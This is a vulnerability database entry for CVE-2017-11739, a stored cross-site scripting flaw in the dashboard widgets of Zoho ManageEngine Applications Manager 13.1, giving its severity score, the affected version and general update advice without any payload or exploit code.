First published: Thu May 23 2019(Updated: )
In Zoho ManageEngine Application Manager 13.1 Build 13100, an authenticated user, with administrative privileges, has the ability to add a widget on any dashboard. This widget can be a "Utility Widget" with a "Custom HTML or Text" field. Once this widget is created, it will be loaded on the dashboard where it was added. An attacker can abuse this functionality by creating a "Utility Widget" that contains malicious JavaScript code, aka XSS.
Credit: cve@mitre.org
Affected Software | Affected Version | How to fix |
---|---|---|
Zohocorp ManageEngine Applications Manager | =13.1-13100 |
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
CVE-2017-11739 is a vulnerability in Zoho ManageEngine Application Manager 13.1 Build 13100 that allows an authenticated user with administrative privileges to add a widget with a Custom HTML or Text field on any dashboard, potentially leading to unauthorized code execution.
The severity of CVE-2017-11739 is medium, with a severity value of 6.1.
CVE-2017-11739 affects Zoho ManageEngine Application Manager 13.1 Build 13100 by allowing an authenticated user with administrative privileges to add a widget with a Custom HTML or Text field on any dashboard.
An attacker can exploit CVE-2017-11739 by creating a malicious widget with a Custom HTML or Text field on a dashboard, potentially leading to unauthorized code execution.
Yes, a fix is available for CVE-2017-11739. Users should update to a version of Zoho ManageEngine Application Manager that is not affected by this vulnerability.